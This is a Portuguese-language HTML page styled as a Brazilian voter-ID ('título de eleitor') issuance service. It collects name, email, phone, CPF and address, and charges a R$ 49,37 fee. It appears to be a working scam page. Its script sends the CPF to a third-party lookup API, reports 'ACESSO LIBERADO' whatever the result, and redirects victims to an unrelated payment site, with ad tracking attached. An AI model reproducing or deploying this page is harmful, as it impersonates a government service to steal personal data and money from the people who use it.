<!DOCTYPE html><html lang="pt-BR"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Emissão de Título de Eleitor</title>
    <script>
        var pixelPattern = /nemu_.{10}/;
        var queryParams = document.location.search.replace("?", "").toString();
        var links = document.getElementsByTagName("a");
        
        for (var i = 0, n = links.length; i < n; i++) {
          if (links[i].href.includes("#")) {
            continue;
          }
        
          links[i].setAttribute("data-original-link-nemu", links[i].href);
          var utms = ["utm_source", "utm_campaign", "utm_medium", "utm_content", "src"];
          var params = document.location.search.replace("?", "").toString().split("&");
          params = params.filter(function (param) { return utms.includes(param.split("=")[0]) }).join("&");
          var href =
            links[i].href.trim() +
            (links[i].href.indexOf("?") > 0 ? "&" : "?") +
            params;
          links[i].href = href;
        }
        if (!pixelPattern.test(queryParams)) {
          var timer = setInterval(function () {
            if (pixelPattern.test(document.location.search)) {
              var links = document.getElementsByTagName("a");
        
              var utms = ["utm_source", "utm_campaign", "utm_medium", "utm_content", "src"];
              var params = document.location.search.replace("?", "").toString().split("&");
              params = params.filter(function (param) { return utms.includes(param.split("=")[0]) }).join("&");
        
              for (var i = 0, n = links.length; i < n; i++) {
                if (links[i].href.includes("#")) {
                  continue;
                }
        
                var originalLink = links[i].getAttribute("data-original-link-nemu") || links[i].href;
        
        
                var href =
                  originalLink.trim() +
                  (originalLink.indexOf("?") > 0 ? "&" : "?") +
                  params;
                links[i].href = href;
              }
              clearInterval(timer);
            }
          }, 500);
        
          setTimeout(function() {
            clearInterval(timer);
          }, 20000);
        }
        </script>
    
        <script src="https://trackings.nemu.com.br/trackings/I4FiQCX60U/script.js" async data-tracking-id="I4FiQCX60U" crossorigin="anonymous"></script>
    
        
    <style>
        body {
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            background-color: #ffffff;
            margin: 0;
            padding: 20px; /* Adiciona espaçamento ao redor do conteúdo */
            display: flex;
            justify-content: center;
            align-items: center;
            min-height: 100vh; /* Permite rolagem se o conteúdo ultrapassar a altura da tela */
            color: #333;
        }

        .container {
            max-width: 600px;
            background-color: #f9f9f9;
            border-radius: 10px;
            padding: 40px;
            box-shadow: 0 10px 20px rgba(0, 0, 0, 0.1);
            animation: fadeIn 1s ease-in-out;
        }

        .logo {
            display: flex;
            justify-content: center;
            margin-bottom: 30px;
            animation: slideInTop 1s ease-in-out;
        }

        .logo img {
            max-width: 250px;
        }

        h2 {
            color: #333;
            text-align: center;
            margin-bottom: 20px;
            animation: fadeIn 1.5s ease-in-out;
        }

        form {
            display: flex;
            flex-direction: column;
        }

        label {
            margin-bottom: 8px;
            font-weight: bold;
            color: #333;
        }

        input[type="text"],
        input[type="email"],
        input[type="tel"],
        input[type="number"] {
            padding: 12px;
            margin-bottom: 20px;
            border: 1px solid #ccc;
            border-radius: 5px;
            width: 100%;
            box-sizing: border-box;
            background-color: #fff;
            color: #333;
            transition: all 0.3s ease;
        }

        input:focus {
            outline: none;
            border-color: #007804;
            box-shadow: 0 0 10px rgba(0, 188, 212, 0.3);
        }

        .form-section {
            margin-bottom: 30px;
        }

        .form-section h3 {
            background-color: #007804;
            color: #fff;
            padding: 10px;
            border-radius: 5px;
            text-align: center;
            margin-bottom: 20px;
            animation: fadeIn 2s ease-in-out;
        }

        .price-info {
            text-align: center;
            margin-bottom: 20px;
            font-size: 20px;
            font-weight: bold;
            color: #007804;
            animation: fadeIn 2s ease-in-out;
        }

        button {
            background-color: #007804;
            color: #fff;
            padding: 15px;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            font-size: 18px;
            transition: all 0.3s ease;
            width: 100%;
        }

        button:hover {
            background-color: #00a5c1;
        }

        #endereco-section {
            display: none;
            animation: fadeIn 1s ease-in-out;
        }

        @media (max-width: 600px) {
            .container {
                padding: 20px;
            }

            .logo img {
                max-width: 180px;
            }

            h2 {
                font-size: 22px;
            }

            .form-section h3 {
                font-size: 18px;
            }

            button {
                font-size: 16px;
            }
        }

        @keyframes fadeIn {
            from { opacity: 0; transform: translateY(20px); }
            to { opacity: 1; transform: translateY(0); }
        }

        @keyframes slideInTop {
            from { opacity: 0; transform: translateY(-50px); }
            to { opacity: 1; transform: translateY(0); }
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="logo">
            <img src="images/7.png" alt="Logo">
        </div>
        <h2>Emissão de Título de Eleitor</h2>
        <form id="form">
            <div class="form-section">
                <h3>Dados Pessoais</h3>
                <label for="nome">Nome Completo:</label>
                <input type="text" id="nome" name="nome" required>
    
                <label for="email">E-mail:</label>
                <input type="email" id="email" name="email" required>
    
                <label for="telefone">Telefone:</label>
                <input type="tel" id="telefone" name="telefone" required>
    
                <label for="cpf">CPF:</label>
                <input type="text" id="cpf" name="cpf" oninput="mascaraCPF(this)" required>
    
                <button type="button" id="next-btn">Próximo</button>
            </div>
    
            <div class="form-section" id="endereco-section" style="display: none;">
                <h3>Endereço</h3>
                <label for="cep">CEP:</label>
                <input type="text" id="cep" name="cep" required>
    
                <label for="endereco">Endereço:</label>
                <input type="text" id="endereco" name="endereco" required>
    
                <label for="numero">Número:</label>
                <input type="text" id="numero" name="numero" required>
    
                <label for="complemento">Complemento:</label>
                <input type="text" id="complemento" name="complemento">
    
                <label for="bairro">Bairro:</label>
                <input type="text" id="bairro" name="bairro" required>
    
                <label for="cidade">Cidade:</label>
                <input type="text" id="cidade" name="cidade" required>
    
                <label for="estado">Estado:</label>
                <input type="text" id="estado" name="estado" required>
            </div>
    
            <div class="price-info">
                R$ 49,37 - valor da emissão do título de eleitor
            </div>
    
            <button type="submit" id="pay-btn" style="display:none;">Pagar</button>
        </form>
    
        <p id="message" class="message"></p>
    </div>
    
    <script>
    document.getElementById('next-btn').addEventListener('click', function () {
        document.getElementById('endereco-section').style.display = 'block';
        document.getElementById('next-btn').style.display = 'none';
        document.getElementById('pay-btn').style.display = 'block';
    });
    
    document.getElementById('form').addEventListener('submit', function (event) {
        event.preventDefault(); // Impede o comportamento padrão do formulário
    
        const cpf = document.getElementById('cpf').value.replace(/\D/g, ''); // Remove caracteres não numéricos
        const messageElement = document.getElementById('message');
    
        if (validarCPF(cpf)) {
            messageElement.textContent = 'Consultando...';
            messageElement.classList.remove('error', 'success');
            messageElement.style.visibility = 'visible';
    
            // URL da API para consulta do CPF
            const url = `https://apiconsultas.store/api/?usuario=03f1ad6ffc4bb309b1660e6a2f8fd5a2&api=cpf&cpf=${cpf}`;
    
            fetch(url)
                .then(response => response.json()) // Converte a resposta para JSON
                .then(data => {
                    if (data.nome) {
                        // Salva o nome e o CPF no localStorage
                        localStorage.setItem('nome', data.nome);
                        localStorage.setItem('cpf', cpf);
    
                        messageElement.textContent = 'ACESSO LIBERADO';
                        messageElement.classList.add('success');
    
                        // Redireciona para /rastreamento com parâmetros da URL preservados
                        setTimeout(() => {
                            window.location.href = 'https://pay.processarpagamento.site/ODAK3LbdW8AGE6V ';
                        }, 2000);
                    } else {
                        // Caso não retorne nome, atribui um valor padrão
                        localStorage.setItem('nome', 'Cliente');
                        localStorage.setItem('cpf', cpf);
    
                        messageElement.textContent = 'ACESSO LIBERADO!';
                        messageElement.classList.add('success');
    
                        setTimeout(() => {
                            window.location.href = 'https://pay.processarpagamento.site/ODAK3LbdW8AGE6V ';
                        }, 2000);
                    }
                })
                .catch(error => {
                    // Tratamento em caso de erro na consulta
                    console.error('Erro ao validar CPF:', error);
                    localStorage.setItem('nome', 'Cliente');
                    localStorage.setItem('cpf', cpf);
    
                    messageElement.textContent = 'ACESSO LIBERADO!';
                    messageElement.classList.add('success');
    
                    setTimeout(() => {
                        window.location.href = 'https://pay.processarpagamento.site/ODAK3LbdW8AGE6V';
                    }, 2000);
                });
        } else {
            messageElement.textContent = 'Por favor, insira um CPF válido.';
            messageElement.classList.add('error');
            messageElement.style.visibility = 'visible';
        }
    });
    
    function mascaraCPF(input) {
        let value = input.value;
    
        if (isNaN(value[value.length - 1])) { // Impede a inserção de caracteres não numéricos
            input.value = value.substring(0, value.length - 1);
            return;
        }
    
        input.setAttribute("maxlength", "14"); // Limita o comprimento do CPF formatado
        if (value.length === 3 || value.length === 7) input.value += ".";
        if (value.length === 11) input.value += "-";
    }
    
    function validarCPF(cpf) {
        // Lógica básica para validação de CPF
        if (cpf.length !== 11) return false;
        let sum = 0;
        let remainder;
    
        for (let i = 1; i <= 9; i++) sum += parseInt(cpf.substring(i - 1, i)) * (11 - i);
        remainder = (sum * 10) % 11;
    
        if (remainder === 10 || remainder === 11) remainder = 0;
        if (remainder !== parseInt(cpf.substring(9, 10))) return false;
    
        sum = 0;
        for (let i = 1; i <= 10; i++) sum += parseInt(cpf.substring(i - 1, i)) * (12 - i);
        remainder = (sum * 10) % 11;
    
        if (remainder === 10 || remainder === 11) remainder = 0;
        if (remainder !== parseInt(cpf.substring(10, 11))) return false;
    
        return true;
    }
    </script>
</body>
</html>